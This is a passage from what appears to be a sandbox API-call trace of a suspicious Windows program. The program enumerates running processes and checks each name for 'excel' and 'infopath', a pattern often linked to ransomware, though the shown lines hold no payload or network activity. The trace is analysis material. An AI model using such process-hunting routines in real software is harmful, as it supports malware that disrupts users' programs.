lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.553] StrStrIA (lpFirst="taskhostw.exe", lpSrch="excel") returned 0x0 [0096.553] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0096.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.555] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3575360 [0096.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3575360, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0096.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0096.555] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="excel") returned 0x0 [0096.555] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0096.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.556] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575260 [0096.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3575260, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0096.556] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0096.556] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="excel") returned 0x0 [0096.556] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0096.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.557] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b050 [0096.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b050, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0096.557] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0096.558] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="excel") returned 0x0 [0096.558] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.559] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577a20 [0096.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577a20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0096.559] StrStrIA (lpFirst="conhost.exe", lpSrch="excel") returned 0x0 [0096.559] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.560] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577948 [0096.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.560] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0096.560] StrStrIA (lpFirst="conhost.exe", lpSrch="excel") returned 0x0 [0096.560] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0096.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.562] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577978 [0096.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3577978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0096.562] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0096.562] StrStrIA (lpFirst="rxodge.exe", lpSrch="excel") returned 0x0 [0096.562] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.563] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577a38 [0096.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3577a38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0096.563] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0096.563] StrStrIA (lpFirst="sppsvc.exe", lpSrch="excel") returned 0x0 [0096.563] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0096.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.564] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35750e0 [0096.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x35750e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0096.564] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0096.564] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="excel") returned 0x0 [0096.564] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0096.612] CloseHandle (hObject=0x350) returned 1 [0096.612] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0096.635] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.637] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575100 [0096.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3575100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0096.637] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0096.637] StrStrIA (lpFirst="[System Process]", lpSrch="infopath") returned 0x0 [0096.637] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0096.638] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574d00 [0096.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0096.638] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0096.638] StrStrIA (lpFirst="System", lpSrch="infopath") returned 0x0 [0096.638] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.640] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3577a50 [0096.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3577a50, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0096.640] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0096.640] StrStrIA (lpFirst="smss.exe", lpSrch="infopath") returned 0x0 [0096.640] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.641] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577a68 [0096.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3577a68, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0096.641] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0096.641] StrStrIA (lpFirst="csrss.exe", lpSrch="infopath") returned 0x0 [0096.641] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.643] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577a80 [0096.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3577a80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0096.643] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0096.643] StrStrIA (lpFirst="wininit.exe", lpSrch="infopath") returned 0x0 [0096.643] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.692] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3577990 [0096.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3577990, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0096.692] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0096.692] StrStrIA (lpFirst="csrss.exe", lpSrch="infopath") returned 0x0 [0096.692] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.693] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577b70 [0096.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3577b70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0096.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0096.693] StrStrIA (lpFirst="winlogon.exe", lpSrch="infopath") returned 0x0 [0096.693] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.695] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577b88 [0096.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3577b88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0096.695] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0096.695] StrStrIA (lpFirst="services.exe", lpSrch="infopath") returned 0x0 [0096.695] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.696] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35779a8 [0096.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35779a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0096.696] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0096.696] StrStrIA (lpFirst="lsass.exe", lpSrch="infopath") returned 0x0 [0096.696] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.697] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35779c0 [0096.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35779c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.697] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.697] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.697] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0096.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.699] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3577ae0 [0096.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3577ae0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0096.699] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0096.699] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="infopath") returned 0x0 [0096.699] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0096.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.700] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35779d8 [0096.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35779d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0096.700] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0096.700] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="infopath") returned 0x0 [0096.700] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.701] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577a98 [0096.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577a98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.702] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.702] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.703] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574db0 [0096.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574db0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0096.703] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0096.703] StrStrIA (lpFirst="dwm.exe", lpSrch="infopath") returned 0x0 [0096.703] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 